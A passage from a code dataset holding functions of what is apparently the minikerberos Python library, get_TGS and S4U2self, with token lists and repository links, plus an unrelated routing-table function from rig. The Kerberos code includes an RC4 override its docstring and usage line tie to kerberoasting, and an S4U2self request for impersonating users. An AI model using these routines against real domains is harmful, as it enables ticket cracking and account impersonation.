ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_data_1 = {}
pa_data_1['padata-type'] = PaDataType.TGS_REQ.value
pa_data_1['padata-value'] = AP_REQ(ap_req).dump()
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
kdc_req['padata'] = [pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = TGS_REQ(kdc_req)
	logger.debug('Sending TGS request to server')
rep = self.ksoc.sendrecv(req.dump())
logger.debug('Got TGS reply, decrypting...')
tgs = rep.native
encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
self.ccache.add_tgs(tgs, encTGSRepPart)
logger.debug('Got valid TGS reply')
self.kerberos_TGS = tgs
return tgs, encTGSRepPart, key | [
"def",
"get_TGS",
"(",
"self",
",",
"spn_user",
",",
"override_etype",
"=",
"None",
")",
":",
"#construct tgs_req",
"logger",
".",
"debug",
"(",
"'Constructing TGS request for user %s'",
"%",
"spn_user",
".",
"get_formatted_pname",
"(",
")",
")",
"now",
"=",
"datetime",
".",
"datetime",
".",
"utcnow",
"(",
")",
"kdc_req_body",
"=",
"{",
"}",
"kdc_req_body",
"[",
"'kdc-options'",
"]",
"=",
"KDCOptions",
"(",
"set",
"(",
"[",
"'forwardable'",
",",
"'renewable'",
",",
"'renewable_ok'",
",",
"'canonicalize'",
"]",
")",
")",
"kdc_req_body",
"[",
"'realm'",
"]",
"=",
"spn_user",
".",
"domain",
".",
"upper",
"(",
")",
"kdc_req_body",
"[",
"'sname'",
"]",
"=",
"PrincipalName",
"(",
"{",
"'name-type'",
":",
"NAME_TYPE",
".",
"SRV_INST",
".",
"value",
",",
"'name-string'",
":",
"spn_user",
".",
"get_principalname",
"(",
")",
"}",
")",
"kdc_req_body",
"[",
"'till'",
"]",
"=",
"now",
"+",
"datetime",
".",
"timedelta",
"(",
"days",
"=",
"1",
")",
"kdc_req_body",
"[",
"'nonce'",
"]",
"=",
"secrets",
".",
"randbits",
"(",
"31",
")",
"if",
"override_etype",
":",
"kdc_req_body",
"[",
"'etype'",
"]",
"=",
"override_etype",
"else",
":",
"kdc_req_body",
"[",
"'etype'",
"]",
"=",
"[",
"self",
".",
"kerberos_cipher_type",
"]",
"authenticator_data",
"=",
"{",
"}",
"authenticator_data",
"[",
"'authenticator-vno'",
"]",
"=",
"krb5_pvno",
"authenticator_data",
"[",
"'crealm'",
"]",
"=",
"Realm",
"(",
"self",
".",
"kerberos_TGT",
"[",
"'crealm'",
"]",
")",
"authenticator_data",
"[",
"'cname'",
"]",
"=",
"self",
".",
"kerberos_TGT",
"[",
"'cname'",
"]",
"authenticator_data",
"[",
"'cusec'",
"]",
"=",
"now",
".",
"microsecond",
"authenticator_data",
"[",
"'ctime'",
"]",
"=",
"now",
"authenticator_data_enc",
"=",
"self",
".",
"kerberos_cipher",
".",
"encrypt",
"(",
"self",
".",
"kerberos_session_key",
",",
"7",
",",
"Authenticator",
"(",
"authenticator_data",
")",
".",
"dump",
"(",
")",
",",
"None",
")",
"ap_req",
"=",
"{",
"}",
"ap_req",
"[",
"'pvno'",
"]",
"=",
"krb5_pvno",
"ap_req",
"[",
"'msg-type'",
"]",
"=",
"MESSAGE_TYPE",
".",
"KRB_AP_REQ",
".",
"value",
"ap_req",
"[",
"'ap-options'",
"]",
"=",
"APOptions",
"(",
"set",
"(",
")",
")",
"ap_req",
"[",
"'ticket'",
"]",
"=",
"Ticket",
"(",
"self",
".",
"kerberos_TGT",
"[",
"'ticket'",
"]",
")",
"ap_req",
"[",
"'authenticator'",
"]",
"=",
"EncryptedData",
"(",
"{",
"'etype'",
":",
"self",
".",
"kerberos_cipher_type",
",",
"'cipher'",
":",
"authenticator_data_enc",
"}",
")",
"pa_data_1",
"=",
"{",
"}",
"pa_data_1",
"[",
"'padata-type'",
"]",
"=",
"PaDataType",
".",
"TGS_REQ",
".",
"value",
"pa_data_1",
"[",
"'padata-value'",
"]",
"=",
"AP_REQ",
"(",
"ap_req",
")",
".",
"dump",
"(",
")",
"kdc_req",
"=",
"{",
"}",
"kdc_req",
"[",
"'pvno'",
"]",
"=",
"krb5_pvno",
"kdc_req",
"[",
"'msg-type'",
"]",
"=",
"MESSAGE_TYPE",
".",
"KRB_TGS_REQ",
".",
"value",
"kdc_req",
"[",
"'padata'",
"]",
"=",
"[",
"pa_data_1",
"]",
"kdc_req",
"[",
"'req-body'",
"]",
"=",
"KDC_REQ_BODY",
"(",
"kdc_req_body",
")",
"req",
"=",
"TGS_REQ",
"(",
"kdc_req",
")",
"logger",
".",
"debug",
"(",
"'Constructing TGS request to server'",
")",
"rep",
"=",
"self",
".",
"ksoc",
".",
"sendrecv",
"(",
"req",
".",
"dump",
"(",
")",
")",
"logger",
".",
"debug",
"(",
"'Got TGS reply, decrypting...'",
")",
"tgs",
"=",
"rep",
".",
"native",
"encTGSRepPart",
"=",
"EncTGSRepPart",
".",
"load",
"(",
"self",
".",
"kerberos_cipher",
".",
"decrypt",
"(",
"self",
".",
"kerberos_session_key",
",",
"8",
",",
"tgs",
"[",
"'enc-part'",
"]",
"[",
"'cipher'",
"]",
")",
")",
".",
"native",
"key",
"=",
"Key",
"(",
"encTGSRepPart",
"[",
"'key'",
"]",
"[",
"'keytype'",
"]",
",",
"encTGSRepPart",
"[",
"'key'",
"]",
"[",
"'keyvalue'",
"]",
")",
"self",
".",
"ccache",
".",
"add_tgs",
"(",
"tgs",
",",
"encTGSRepPart",
")",
"logger",
".",
"debug",
"(",
"'Got valid TGS reply'",
")",
"self",
".",
"kerberos_TGS",
"=",
"tgs",
"return",
"tgs",
",",
"encTGSRepPart",
",",
"key"
] | Requests a TGS ticket for the specified user.
Returns the TGS ticket and the decrypted encTGSRepPart.
spn_user: KerberosTarget: the service user you want to get TGS for.
override_etype: None or list of etype values (int) Used mostly for kerberoasting, will override the AP_REQ supported etype values (which are derived from the TGT) to be able to receive whatever TGS ticket | [
"Requests",
"a",
"TGS",
"ticket",
"for",
"the",
"specified",
"user",
".",
"Retruns",
"the",
"TGS",
"ticket",
"end",
"the",
"decrpyted",
"encTGSRepPart",
"."
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/communication.py#L287-L348 |
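Usage sketch, following a successful get_TGT() on the same KerbrosComm instance kc:
tgs, enc_tgs_rep_part, key = kc.get_TGS(spn_user)          # spn_user: KerberosTarget
tgs_rc4, _, _ = kc.get_TGS(spn_user, override_etype=[23])  # force RC4, e.g. for kerberoasting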
skelsec/minikerberos | minikerberos/communication.py | KerbrosComm.S4U2self | def S4U2self(self, user_to_impersonate, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
#def S4U2self(self, user_to_impersonate, spn_user, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
"""
user_to_impersonate : KerberosTarget class
"""
if not self.kerberos_TGT:
logger.debug('S4U2self invoked, but TGT is not available! Fetching TGT...')
self.get_TGT()
supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
auth_package_name = 'Kerberos'
now = datetime.datetime.utcnow()
###### Calculating authenticator data
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_data_auth = {}
pa_data_auth['padata-type'] = PaDataType.TGS_REQ.value
pa_data_auth['padata-value'] = AP_REQ(ap_req).dump()
###### Calculating checksum data
S4UByteArray = NAME_TYPE.PRINCIPAL.value.to_bytes(4, 'little', signed = False)
S4UByteArray += user_to_impersonate.username.encode()
S4UByteArray += user_to_impersonate.domain.encode()
S4UByteArray += auth_package_name.encode()
logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray.hex())
logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray)
chksum_data = _HMACMD5.checksum(self.kerberos_session_key, 17, S4UByteArray)
logger.debug('S4U2self: chksum_data: %s' % chksum_data.hex())
chksum = {}
chksum['cksumtype'] = int(CKSUMTYPE('HMAC_MD5'))
chksum['checksum'] = chksum_data
###### Filling out PA-FOR-USER data for impersonation
pa_for_user_enc = {}
pa_for_user_enc['userName'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': user_to_impersonate.get_principalname()})
pa_for_user_enc['userRealm'] = user_to_impersonate.domain
pa_for_user_enc['cksum'] = Checksum(chksum)
pa_for_user_enc['auth-package'] = auth_package_name
pa_for_user = {}
pa_for_user['padata-type'] = int(PADATA_TYPE('PA-FOR-USER'))
pa_for_user['padata-value'] = PA_FOR_USER_ENC(pa_for_user_enc).dump()
###### Constructing body
krb_tgs_body = {}
krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','canonicalize']))
krb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.UNKNOWN.value, 'name-string': [self.usercreds.username]})
krb_tgs_body['realm'] = self.usercreds.domain.upper()
krb_tgs_body['till'] = now + datetime.timedelta(days=1)
krb_tgs_body['nonce'] = secrets.randbits(31)
krb_tgs_body['etype'] = [supp_enc.value] #selecting according to server's preferences
krb_tgs_req = {}
krb_tgs_req['pvno'] = krb5_pvno
krb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
krb_tgs_req['padata'] = [pa_data_auth, pa_for_user]
krb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)
req = TGS_REQ(krb_tgs_req)
logger.debug('Sending S4U2self request to server')
try:
reply = self.ksoc.sendrecv(req.dump())
except KerberosError as e:
if e.errorcode.value == 16:
logger.error('S4U2self: Failed to get S4U2self! Error code (16) indicates that delegation is not enabled for this account! Full error: %s' % e)
raise e
logger.debug('Got S4U2self reply, decrypting...')
tgs = reply.native
encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
self.ccache.add_tgs(tgs, encTGSRepPart)
logger.debug('Got valid TGS reply')
self.kerberos_TGS = tgs
return tgs, encTGSRepPart, key | python | def S4U2self(self, user_to_impersonate, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
#def S4U2self(self, user_to_impersonate, spn_user, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
"""
user_to_impersonate : KerberosTarget class
"""
if not self.kerberos_TGT:
logger.debug('S4U2self invoked, but TGT is not available! Fetching TGT...')
self.get_TGT()
supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
auth_package_name = 'Kerberos'
now = datetime.datetime.utcnow()
###### Calculating authenticator data
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_data_auth = {}
pa_data_auth['padata-type'] = PaDataType.TGS_REQ.value
pa_data_auth['padata-value'] = AP_REQ(ap_req).dump()
###### Calculating checksum data
S4UByteArray = NAME_TYPE.PRINCIPAL.value.to_bytes(4, 'little', signed = False)
S4UByteArray += user_to_impersonate.username.encode()
S4UByteArray += user_to_impersonate.domain.encode()
S4UByteArray += auth_package_name.encode()
logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray.hex())
logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray)
chksum_data = _HMACMD5.checksum(self.kerberos_session_key, 17, S4UByteArray)
logger.debug('S4U2self: chksum_data: %s' % chksum_data.hex())
chksum = {}
chksum['cksumtype'] = int(CKSUMTYPE('HMAC_MD5'))
chksum['checksum'] = chksum_data
###### Filling out PA-FOR-USER data for impersonation
pa_for_user_enc = {}
pa_for_user_enc['userName'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': user_to_impersonate.get_principalname()})
pa_for_user_enc['userRealm'] = user_to_impersonate.domain
pa_for_user_enc['cksum'] = Checksum(chksum)
pa_for_user_enc['auth-package'] = auth_package_name
pa_for_user = {}
pa_for_user['padata-type'] = int(PADATA_TYPE('PA-FOR-USER'))
pa_for_user['padata-value'] = PA_FOR_USER_ENC(pa_for_user_enc).dump()
###### Constructing body
krb_tgs_body = {}
krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','canonicalize']))
krb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.UNKNOWN.value, 'name-string': [self.usercreds.username]})
krb_tgs_body['realm'] = self.usercreds.domain.upper()
krb_tgs_body['till'] = now + datetime.timedelta(days=1)
krb_tgs_body['nonce'] = secrets.randbits(31)
krb_tgs_body['etype'] = [supp_enc.value] #selecting according to server's preferences
krb_tgs_req = {}
krb_tgs_req['pvno'] = krb5_pvno
krb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
krb_tgs_req['padata'] = [pa_data_auth, pa_for_user]
krb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)
req = TGS_REQ(krb_tgs_req)
logger.debug('Sending S4U2self request to server')
try:
reply = self.ksoc.sendrecv(req.dump())
except KerberosError as e:
if e.errorcode.value == 16:
logger.error('S4U2self: Failed to get S4U2self! Error code (16) indicates that delegation is not enabled for this account! Full error: %s' % e)
raise e
logger.debug('Got S4U2self reply, decrypting...')
tgs = reply.native
encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
self.ccache.add_tgs(tgs, encTGSRepPart)
logger.debug('Got valid TGS reply')
self.kerberos_TGS = tgs
return tgs, encTGSRepPart, key | [
"def",
"S4U2self",
"(",
"self",
",",
"user_to_impersonate",
",",
"supp_enc_methods",
"=",
"[",
"EncryptionType",
".",
"DES_CBC_CRC",
",",
"EncryptionType",
".",
"DES_CBC_MD4",
",",
"EncryptionType",
".",
"DES_CBC_MD5",
",",
"EncryptionType",
".",
"DES3_CBC_SHA1",
",",
"EncryptionType",
".",
"ARCFOUR_HMAC_MD5",
",",
"EncryptionType",
".",
"AES256_CTS_HMAC_SHA1_96",
",",
"EncryptionType",
".",
"AES128_CTS_HMAC_SHA1_96",
"]",
")",
":",
"#def S4U2self(self, user_to_impersonate, spn_user, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):",
"if",
"not",
"self",
".",
"kerberos_TGT",
":",
"logger",
".",
"debug",
"(",
"'S4U2self invoked, but TGT is not available! Fetching TGT...'",
")",
"self",
".",
"get_TGT",
"(",
")",
"supp_enc",
"=",
"self",
".",
"usercreds",
".",
"get_preferred_enctype",
"(",
"supp_enc_methods",
")",
"auth_package_name",
"=",
"'Kerberos'",
"now",
"=",
"datetime",
".",
"datetime",
".",
"utcnow",
"(",
")",
"###### Calculating authenticator data",
"authenticator_data",
"=",
"{",
"}",
"authenticator_data",
"[",
"'authenticator-vno'",
"]",
"=",
"krb5_pvno",
"authenticator_data",
"[",
"'crealm'",
"]",
"=",
"Realm",
"(",
"self",
".",
"kerberos_TGT",
"[",
"'crealm'",
"]",
")",
"authenticator_data",
"[",
"'cname'",
"]",
"=",
"self",
".",
"kerberos_TGT",
"[",
"'cname'",
"]",
"authenticator_data",
"[",
"'cusec'",
"]",
"=",
"now",
".",
"microsecond",
"authenticator_data",
"[",
"'ctime'",
"]",
"=",
"now",
"authenticator_data_enc",
"=",
"self",
".",
"kerberos_cipher",
".",
"encrypt",
"(",
"self",
".",
"kerberos_session_key",
",",
"7",
",",
"Authenticator",
"(",
"authenticator_data",
")",
".",
"dump",
"(",
")",
",",
"None",
")",
"ap_req",
"=",
"{",
"}",
"ap_req",
"[",
"'pvno'",
"]",
"=",
"krb5_pvno",
"ap_req",
"[",
"'msg-type'",
"]",
"=",
"MESSAGE_TYPE",
".",
"KRB_AP_REQ",
".",
"value",
"ap_req",
"[",
"'ap-options'",
"]",
"=",
"APOptions",
"(",
"set",
"(",
")",
")",
"ap_req",
"[",
"'ticket'",
"]",
"=",
"Ticket",
"(",
"self",
".",
"kerberos_TGT",
"[",
"'ticket'",
"]",
")",
"ap_req",
"[",
"'authenticator'",
"]",
"=",
"EncryptedData",
"(",
"{",
"'etype'",
":",
"self",
".",
"kerberos_cipher_type",
",",
"'cipher'",
":",
"authenticator_data_enc",
"}",
")",
"pa_data_auth",
"=",
"{",
"}",
"pa_data_auth",
"[",
"'padata-type'",
"]",
"=",
"PaDataType",
".",
"TGS_REQ",
".",
"value",
"pa_data_auth",
"[",
"'padata-value'",
"]",
"=",
"AP_REQ",
"(",
"ap_req",
")",
".",
"dump",
"(",
")",
"###### Calculating checksum data",
"S4UByteArray",
"=",
"NAME_TYPE",
".",
"PRINCIPAL",
".",
"value",
".",
"to_bytes",
"(",
"4",
",",
"'little'",
",",
"signed",
"=",
"False",
")",
"S4UByteArray",
"+=",
"user_to_impersonate",
".",
"username",
".",
"encode",
"(",
")",
"S4UByteArray",
"+=",
"user_to_impersonate",
".",
"domain",
".",
"encode",
"(",
")",
"S4UByteArray",
"+=",
"auth_package_name",
".",
"encode",
"(",
")",
"logger",
".",
"debug",
"(",
"'S4U2self: S4UByteArray: %s'",
"%",
"S4UByteArray",
".",
"hex",
"(",
")",
")",
"logger",
".",
"debug",
"(",
"'S4U2self: S4UByteArray: %s'",
"%",
"S4UByteArray",
")",
"chksum_data",
"=",
"_HMACMD5",
".",
"checksum",
"(",
"self",
".",
"kerberos_session_key",
",",
"17",
",",
"S4UByteArray",
")",
"logger",
".",
"debug",
"(",
"'S4U2self: chksum_data: %s'",
"%",
"chksum_data",
".",
"hex",
"(",
")",
")",
"chksum",
"=",
"{",
"}",
"chksum",
"[",
"'cksumtype'",
"]",
"=",
"int",
"(",
"CKSUMTYPE",
"(",
"'HMAC_MD5'",
")",
")",
"chksum",
"[",
"'checksum'",
"]",
"=",
"chksum_data",
"###### Filling out PA-FOR-USER data for impersonation",
"pa_for_user_enc",
"=",
"{",
"}",
"pa_for_user_enc",
"[",
"'userName'",
"]",
"=",
"PrincipalName",
"(",
"{",
"'name-type'",
":",
"NAME_TYPE",
".",
"PRINCIPAL",
".",
"value",
",",
"'name-string'",
":",
"user_to_impersonate",
".",
"get_principalname",
"(",
")",
"}",
")",
"pa_for_user_enc",
"[",
"'userRealm'",
"]",
"=",
"user_to_impersonate",
".",
"domain",
"pa_for_user_enc",
"[",
"'cksum'",
"]",
"=",
"Checksum",
"(",
"chksum",
")",
"pa_for_user_enc",
"[",
"'auth-package'",
"]",
"=",
"auth_package_name",
"pa_for_user",
"=",
"{",
"}",
"pa_for_user",
"[",
"'padata-type'",
"]",
"=",
"int",
"(",
"PADATA_TYPE",
"(",
"'PA-FOR-USER'",
")",
")",
"pa_for_user",
"[",
"'padata-value'",
"]",
"=",
"PA_FOR_USER_ENC",
"(",
"pa_for_user_enc",
")",
".",
"dump",
"(",
")",
"###### Constructing body",
"krb_tgs_body",
"=",
"{",
"}",
"krb_tgs_body",
"[",
"'kdc-options'",
"]",
"=",
"KDCOptions",
"(",
"set",
"(",
"[",
"'forwardable'",
",",
"'renewable'",
",",
"'canonicalize'",
"]",
")",
")",
"krb_tgs_body",
"[",
"'sname'",
"]",
"=",
"PrincipalName",
"(",
"{",
"'name-type'",
":",
"NAME_TYPE",
".",
"UNKNOWN",
".",
"value",
",",
"'name-string'",
":",
"[",
"self",
".",
"usercreds",
".",
"username",
"]",
"}",
")",
"krb_tgs_body",
"[",
"'realm'",
"]",
"=",
"self",
".",
"usercreds",
".",
"domain",
".",
"upper",
"(",
")",
"krb_tgs_body",
"[",
"'till'",
"]",
"=",
"now",
"+",
"datetime",
".",
"timedelta",
"(",
"days",
"=",
"1",
")",
"krb_tgs_body",
"[",
"'nonce'",
"]",
"=",
"secrets",
".",
"randbits",
"(",
"31",
")",
"krb_tgs_body",
"[",
"'etype'",
"]",
"=",
"[",
"supp_enc",
".",
"value",
"]",
"#selecting according to server's preferences",
"krb_tgs_req",
"=",
"{",
"}",
"krb_tgs_req",
"[",
"'pvno'",
"]",
"=",
"krb5_pvno",
"krb_tgs_req",
"[",
"'msg-type'",
"]",
"=",
"MESSAGE_TYPE",
".",
"KRB_TGS_REQ",
".",
"value",
"krb_tgs_req",
"[",
"'padata'",
"]",
"=",
"[",
"pa_data_auth",
",",
"pa_for_user",
"]",
"krb_tgs_req",
"[",
"'req-body'",
"]",
"=",
"KDC_REQ_BODY",
"(",
"krb_tgs_body",
")",
"req",
"=",
"TGS_REQ",
"(",
"krb_tgs_req",
")",
"logger",
".",
"debug",
"(",
"'Sending S4U2self request to server'",
")",
"try",
":",
"reply",
"=",
"self",
".",
"ksoc",
".",
"sendrecv",
"(",
"req",
".",
"dump",
"(",
")",
")",
"except",
"KerberosError",
"as",
"e",
":",
"if",
"e",
".",
"errorcode",
".",
"value",
"==",
"16",
":",
"logger",
".",
"error",
"(",
"'S4U2self: Failed to get S4U2self! Error code (16) indicates that delegation is not enabled for this account! Full error: %s'",
"%",
"e",
")",
"raise",
"e",
"logger",
".",
"debug",
"(",
"'Got S4U2self reply, decrypting...'",
")",
"tgs",
"=",
"reply",
".",
"native",
"encTGSRepPart",
"=",
"EncTGSRepPart",
".",
"load",
"(",
"self",
".",
"kerberos_cipher",
".",
"decrypt",
"(",
"self",
".",
"kerberos_session_key",
",",
"8",
",",
"tgs",
"[",
"'enc-part'",
"]",
"[",
"'cipher'",
"]",
")",
")",
".",
"native",
"key",
"=",
"Key",
"(",
"encTGSRepPart",
"[",
"'key'",
"]",
"[",
"'keytype'",
"]",
",",
"encTGSRepPart",
"[",
"'key'",
"]",
"[",
"'keyvalue'",
"]",
")",
"self",
".",
"ccache",
".",
"add_tgs",
"(",
"tgs",
",",
"encTGSRepPart",
")",
"logger",
".",
"debug",
"(",
"'Got valid TGS reply'",
")",
"self",
".",
"kerberos_TGS",
"=",
"tgs",
"return",
"tgs",
",",
"encTGSRepPart",
",",
"key"
] | user_to_impersonate : KerberosTarget class | [
"user_to_impersonate",
":",
"KerberosTarget",
"class"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/communication.py#L351-L453 |
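Usage sketch; as the error handling above shows, KDC error code 16 means constrained delegation is not enabled for the authenticating account:
tgs, enc_part, key = kc.S4U2self(user_to_impersonate)  # user_to_impersonate: KerberosTarget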
project-rig/rig | rig/routing_table/remove_default_routes.py | minimise | def minimise(table, target_length, check_for_aliases=True):
"""Remove from the routing table any entries which could be replaced by
default routing.
Parameters
----------
    table : [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Routing table from which to remove entries which could be handled by
default routing.
target_length : int or None
Target length of the routing table.
check_for_aliases : bool
If True (the default), default-route candidates are checked for aliased
entries before suggesting a route may be default routed. This check is
required to ensure correctness in the general case but has a runtime
complexity of O(N^2) in the worst case for N-entry tables.
If False, the alias-check is skipped resulting in O(N) runtime. This
option should only be used if the supplied table is guaranteed not to
contain any aliased entries.
Raises
------
MinimisationFailedError
If the smallest table that can be produced is larger than
`target_length`.
Returns
-------
[:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Reduced routing table entries.
"""
# If alias checking is required, see if we can cheaply prove that no
# aliases exist in the table to skip this costly check.
if check_for_aliases:
# Aliases cannot exist when all entries share the same mask and all
# keys are unique.
if len(set(e.mask for e in table)) == 1 and \
len(table) == len(set(e.key for e in table)):
check_for_aliases = False
# Generate a new table with default-route entries removed
new_table = list()
for i, entry in enumerate(table):
if not _is_defaultable(i, entry, table, check_for_aliases):
# If the entry cannot be removed then add it to the table
new_table.append(entry)
# If the resultant table is larger than the target raise an exception
if target_length is not None and target_length < len(new_table):
raise MinimisationFailedError(target_length, len(new_table))
return new_table | python | def minimise(table, target_length, check_for_aliases=True):
"""Remove from the routing table any entries which could be replaced by
default routing.
Parameters
----------
    table : [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Routing table from which to remove entries which could be handled by
default routing.
target_length : int or None
Target length of the routing table.
check_for_aliases : bool
If True (the default), default-route candidates are checked for aliased
entries before suggesting a route may be default routed. This check is
required to ensure correctness in the general case but has a runtime
complexity of O(N^2) in the worst case for N-entry tables.
If False, the alias-check is skipped resulting in O(N) runtime. This
option should only be used if the supplied table is guaranteed not to
contain any aliased entries.
Raises
------
MinimisationFailedError
If the smallest table that can be produced is larger than
`target_length`.
Returns
-------
[:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Reduced routing table entries.
"""
# If alias checking is required, see if we can cheaply prove that no
# aliases exist in the table to skip this costly check.
if check_for_aliases:
# Aliases cannot exist when all entries share the same mask and all
# keys are unique.
if len(set(e.mask for e in table)) == 1 and \
len(table) == len(set(e.key for e in table)):
check_for_aliases = False
# Generate a new table with default-route entries removed
new_table = list()
for i, entry in enumerate(table):
if not _is_defaultable(i, entry, table, check_for_aliases):
# If the entry cannot be removed then add it to the table
new_table.append(entry)
# If the resultant table is larger than the target raise an exception
if target_length is not None and target_length < len(new_table):
raise MinimisationFailedError(target_length, len(new_table))
return new_table | [
"def",
"minimise",
"(",
"table",
",",
"target_length",
",",
"check_for_aliases",
"=",
"True",
")",
":",
"# If alias checking is required, see if we can cheaply prove that no",
"# aliases exist in the table to skip this costly check.",
"if",
"check_for_aliases",
":",
"# Aliases cannot exist when all entries share the same mask and all",
"# keys are unique.",
"if",
"len",
"(",
"set",
"(",
"e",
".",
"mask",
"for",
"e",
"in",
"table",
")",
")",
"==",
"1",
"and",
"len",
"(",
"table",
")",
"==",
"len",
"(",
"set",
"(",
"e",
".",
"key",
"for",
"e",
"in",
"table",
")",
")",
":",
"check_for_aliases",
"=",
"False",
"# Generate a new table with default-route entries removed",
"new_table",
"=",
"list",
"(",
")",
"for",
"i",
",",
"entry",
"in",
"enumerate",
"(",
"table",
")",
":",
"if",
"not",
"_is_defaultable",
"(",
"i",
",",
"entry",
",",
"table",
",",
"check_for_aliases",
")",
":",
"# If the entry cannot be removed then add it to the table",
"new_table",
".",
"append",
"(",
"entry",
")",
"# If the resultant table is larger than the target raise an exception",
"if",
"target_length",
"is",
"not",
"None",
"and",
"target_length",
"<",
"len",
"(",
"new_table",
")",
":",
"raise",
"MinimisationFailedError",
"(",
"target_length",
",",
"len",
"(",
"new_table",
")",
")",
"return",
"new_table"
] | Remove from the routing table any entries which could be replaced by
default routing.
Parameters
----------
table : [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Routing table from which to remove entries which could be handled by
default routing.
target_length : int or None
Target length of the routing table.
check_for_aliases : bool
If True (the default), default-route candidates are checked for aliased
entries before suggesting a route may be default routed. This check is
required to ensure correctness in the general case but has a runtime
complexity of O(N^2) in the worst case for N-entry tables.
If False, the alias-check is skipped resulting in O(N) runtime. This
option should only be used if the supplied table is guaranteed not to
contain any aliased entries.
Raises
------
MinimisationFailedError
If the smallest table that can be produced is larger than
`target_length`.
Returns
-------
[:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Reduced routing table entries. | [
"Remove",
"from",
"the",
"routing",
"table",
"any",
"entries",
"which",
"could",
"be",
"replaced",
"by",
"default",
"routing",
